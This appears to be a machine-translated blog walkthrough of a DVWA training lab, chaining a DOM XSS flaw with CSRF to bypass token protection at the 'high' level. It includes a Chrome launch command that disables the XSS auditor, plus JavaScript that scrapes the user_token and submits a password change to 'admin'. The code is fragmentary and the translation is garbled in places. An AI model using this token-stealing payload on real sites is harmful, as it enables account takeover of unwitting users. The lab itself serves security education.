DVWA-CSRF Cross Station Request Forgery - High level

Basic knowledge introduction to csrf attack process

Experimental environment:

CSRF simulated attack environment (this is the Intranet environment. The public network only needs to map the port, and other operations are the same)

CentOS7 DVWA server (analog transfer system)

kali hacker (attacker)

Win10 user (victim)

1. Service conditions:

1. Use to close the chrome browser of XSS

New chrome browser shortcut

"C:\Program Files (x86)\Google\Chrome\chrome-xss.exe" is the path of my Chrome browser, which varies from person to person

Rename to chrome XSS Exe on the command line (cmd)

"C:\Program Files (x86)\Google\Chrome\chrome-xss.exe" --args–disable-xss-auditor

Shortcut path + -- args – disable XSS auditor to create a chrome browser that closes XSS

2. XSS vulnerability exists to obtain its cookie

XSS and CSRF are used together to change the user password

1.2 source code analysis


1.2.1high level code adds Token authentication.

(Token: ensure that each user's request is unique. The Token is generated randomly and will become invalid after a period of time)

A whitelist is executed in the XSS source code. We can add # comments so that the statements after # can be parsed in the page without being transmitted to the server


1.2.2 exploit existing XSS vulnerabilities

1.2.3 start injection



(test does not pop up in this step. Check whether the chrome browser has closed XSS)

1.2.4 construct attack request

Write, code content annotation marked

//Pop up cookie
//Define AJAX loaded pages
	var theUrl = '';
//Match browser
if (window.XMLHttpRequest){
// IE7+, Firefox, Chrome, Opera, Safari
		xmlhttp=new XMLHttpRequest(); 
// IE6, IE5
		xmlhttp=new ActiveXObject("Microsoft.XMLHTTP"); 
	var count = 0;//Statistics of change times to prevent repeated submission of password modification requests
//Execute the function after the page is loaded
//The code is executed when it is judged that the request has been completed and the response ready status code is 200
	if (xmlhttp.readyState==4 && xmlhttp.status==200)
//Store the page content in text for matching token
		var text = xmlhttp.responseText;
		var regex = /user_token\' value\=\'(.*?)\' \/\>/;//Take out the Token through regular filtering
		var match = text.match(regex);
//Pop up token
		var token = match[1];
//Define the payload url and bind the token to the token we matched from the page, and define a new password. The new password is admin
var new_url = ' user_ token='+token+'&password_ new=admin&password_ Conf = Admin & change = change '/ / password change request
//Submit new once in GET mode_ url
//Submit theUrl in GET mode

1.2.5 use XSS (DOM) vulnerability to load CSRF JS code trigger attack

The constructed Payload induces the user to click to access, complete the attack and change the user password

WIN10 access<script src=""></script>

Cookie pop-up

Token pop-up

Pop up the new token obtained, which is used to submit the password modification instruction of the hacker


Password changed successfully

If you don't need a pop-up window to comment out the following code / / Alert (document. Cookie)// alert(match[1]);

Detailed code analysis. In fact, the code framework is an AJAX operation.

Ajax overview: AJAX is a technology that can update some web pages without reloading the whole web page. There is no detailed introduction here. If you want to know, you can refer to the following materials. Detailed introduction to Ajax: Introduction to AJAX

Utilization principle:

1. Get csrf page content through XMLHttpRequest

2. Parse the new Token, associate the Token with the submitted password parameters, and access successfully

Keywords: Front-end security csrf

Added by lupld on Sun, 27 Feb 2022 08:20:21 +0200